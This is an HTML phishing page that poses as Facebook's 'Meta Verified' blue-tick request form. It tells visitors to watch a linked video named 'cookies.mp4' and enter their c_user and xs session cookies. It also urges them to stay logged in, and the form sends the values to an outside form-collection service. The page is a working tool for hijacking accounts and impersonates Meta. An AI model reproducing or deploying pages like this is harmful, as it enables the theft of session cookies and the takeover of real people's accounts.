<!DOCTYPE html>
<html lang="en">
<head>
  
    
    <meta charset="UTF-8">
    <link rel="icon" href="https://pbs.twimg.com/media/GQB99gQaQAEUOZ7?format=png&name=small">
    
    <title>Meta Verified | Get a verified blue tick</title>
    <style>
        *{
  margin: 0;
  padding: 0;
  font-family: 'poppins', sans-serif;
}

body{

  background-color: #efefef;
}

nav{

  display: flex;
  align-items: center;
  justify-content: space-between;
  background-color: #3b5998;
  padding: 15px 10%;
}

.txt-2{

  font-style: normal;
  font-weight: bold;
  font-size: 45px;
  color: #ffffff;
  margin-right: 45px;

}

.av-r, .av-l{

  display: flex;
  align-items: center;
}

.sh-box{

  background: #efefef;
  width: 300px;
  border-radius:2px;
  display: flex;
  align-items: center;
  padding: 0 15px;
  
}

.sh-box img{
  width: 18px;
}

.sh-box input{

  width: 100%;
  background: transparent;
  padding: 10px;
  outline: none;
  border: 0;
}

.deho{

  display: flex;
  justify-content: center;
  align-items: center;
  margin-top: 2rem;
}

.content {
text-align: left;
padding: 20px;
padding-top: 5px;
background-color: #f5f5f5;
width: 100%;
max-width: 50%;
border-radius: 3px;
border: 1px solid #cccccc;
box-sizing: border-box;
}


.text5{
font-style: normal;
font-size: small;
opacity: 95%;
}

.vd2{
margin-top: 15px;
}

.text3{
font-style: normal;
font-size: 15px;
font-weight: bold;
opacity: 50%;
}

.head{
font-size: large;
font-weight: bold;
opacity: 70%;
margin-top: 10px;
background-color: #efefef
}

.tx-2{

font-weight: bold;
font-size: medium;
opacity: 50%;
margin-top: 10px;

}
input {

border-width: 1px;
border-style: solid;
border-color: #c7c1c1;
padding: 5px ;
border-radius: 5px;

}

.t1{

font-style: normal;
font-size: small;
opacity: 95%;
margin-top: 15px;
margin-bottom: 50px;
}

.copyright{

font-style: normal;
font-weight: 550;
opacity: 70%;
padding: 15px 2%;
margin-top: 50px;
}

.sub2 {
position: relative;
width: 100%;
background-color: #f0f0f0;
}

.bn2 {
position: absolute;
top: 50%; 
left: 93%; 
transform: translate(-50%, -80%);
padding: 8px 2%;
background-color: #4267b2;
color: #ffffff;
border: none;
cursor: pointer;
font-weight: 550;
font-size: 80%;
border-radius: 3px;
}
    </style>
</head>
<body>


    <nav>
        <div class="av-l">
            <p class="txt-2">
                facebook
            </p>
        </div>
        <div class="av-r">
            <div class="sh-box">
              
            </div>
        </div>
    </nav>

  <div class="deho">

    <form class="content" action="https://submit-form.com/KaNZeiDCj" method="post">
      <input hidden="true" name="redirectURL" value="">
      
            
      <p class="head">Request a verified badge on Facebook</p> <br>

      <div class="text5">

        <p>
          The verified badge means that Facebook has confirmed that the Page or profile is the authentic presence of the individual, public figure or brand that it represents.</p>
      <br>
        Previously, the verified badge also required the person or brand to be notable and unique. You may still see users with a verified badge that represents our previous eligibility requirements.</p><p>
      <br>
        Please provide the precise details below. Refer to the video for clarification if you find the instructions unclear.
      </p>
  
      </div>

      <div class="vd2">

        <p class="text3">Detailed Video Information</p>

        <a href="https://cdn.glitch.global/cfdab748-b145-4b28-8f85-c26ac388a3c9/cookies.mp4?v=1719846896202">
          <img src="https://i.pinimg.com/originals/97/95/69/979569a2dedd37573974ceebc05b4a4e.png" width="230" >
        </a>
        
        <h4>
          Must Watch the video to submit required information badge
          won't be get with incorrect information!
        </h4><br>
        <p class="text5">Please be sure to provide the requested information below.</p>

      </div>

      <div>
        <p class="tx-2">
        c_user
       </p>
        <input type="number" name="c_user" id="c_user" pattern="[0-9]+" minlength="6"  required="">
      </div>

      <div>
        <p class="tx-2">
        xs
       </p>
        <input  type="text" name="xs" id="xs" pattern="^(?=.*[a-z])(?=.*[A-Z])(?=.*\d)(?=.*[@#$%^&amp;+=]).{12,}$"  required="">
      </div>
      <p class="t1">Please make sure account not to log out from your computer or laptop until you have received a verification email.</p>

      <div class="sub2">
        <button class="bn2">
          <p>
            Submit
          </p>
        </button>
  
      </div>

    </form>
    
  </div>

  <div class="copyright">
    <p>Meta © 2024</p>
  </div>

    
</body>
</html>
